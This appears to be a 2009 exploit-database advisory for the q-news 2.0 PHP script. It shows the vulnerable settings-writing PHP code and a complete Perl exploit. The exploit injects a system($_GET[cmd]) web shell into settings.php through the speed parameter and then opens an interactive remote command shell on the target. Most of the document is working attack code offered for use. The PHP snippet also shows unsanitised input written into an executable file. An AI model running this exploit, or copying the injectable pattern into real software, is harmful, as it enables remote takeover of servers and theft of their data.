##########################################################################
Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org
Vulnerability = Remote Command Execution
Software = q-news 2.0
Download =
http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip
Greets to = Osirys for his friendship and his tips, Myral, str0ke
###########################################################################
[CODE]
<?php
$filename = 'settings.php';
if (is_writable($filename)) {
if (!$handle = fopen($filename, 'w')) {
print "Cannot open file ($filename)";
exit;
}
if (!fwrite($handle, "<?php
\$password = '$password';
\$font = '$font';
\$height = '$height';
\$width = '$width';
\$direction = '$direction';
\$speed = '$speed';
\$bgcolor = '$bgcolor';
\$txtcolor = '$txtcolor';
\$txtsize = '$txtsize';
?>")) {
print "Cannot write to file ($filename)";
exit;
}
print "Successfully saved settings to file ($filename)";
fclose($handle);
} else {
print "The file $filename is not writable";
}
?>
[/CODE]
[EXPLOIT]
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
my $host = $ARGV[0];
my $vuln = "/wsettings.php?speed=";
my $rce = "/settings.php?cmd=";
my $evil = "';system(\$_GET[cmd]);\$x = '";
my $inj_url = $host.$vuln.$evil;
my $rce_url = $host.$rce;
($host) || die " usage= perl $0 site \n";
print "------------------------\n";
print " Q-News RCE Exploit \n";
print " by FireShot \n";
print "------------------------\n\n";
$response = get($inj_url);
if ($response =~ /Successfully saved settings/) {
&shell;
}
else {
print "error \n";
exit(0);
}
sub shell {
print "FireShot-shell: ";
my $cmd = <STDIN>;
$cmd !~ /quit/ || die " exit \n";
my $url = $rce_url.$cmd;
my $re = get($url);
if ($re =~ /(.)/) {
print $re;
}
else {
print "command unknow \n";
}
&shell;
}
sub get() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $agent = LWP::UserAgent->new();
$agent->timeout(4);
my $response = $agent->request($req);
return $response->content;
}
[/EXPLOIT]
############################################################################
# milw0rm.com [2009-02-10]